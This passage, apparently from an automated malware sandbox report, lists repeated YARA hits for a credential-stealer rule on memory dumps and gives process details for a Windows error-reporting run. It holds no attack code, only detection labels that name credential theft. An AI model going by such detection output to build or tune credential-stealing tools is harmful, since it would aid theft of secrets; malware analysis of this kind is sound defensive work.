                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1456839533.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1455085981.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1453850480.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1455783102.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1453566886.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1454050433.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1456317993.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1452841763.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1454484117.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1454264424.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:02:31:52
                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 2040
                                                                                                                                                                              Imagebase:0x7c0000
                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              No disassembly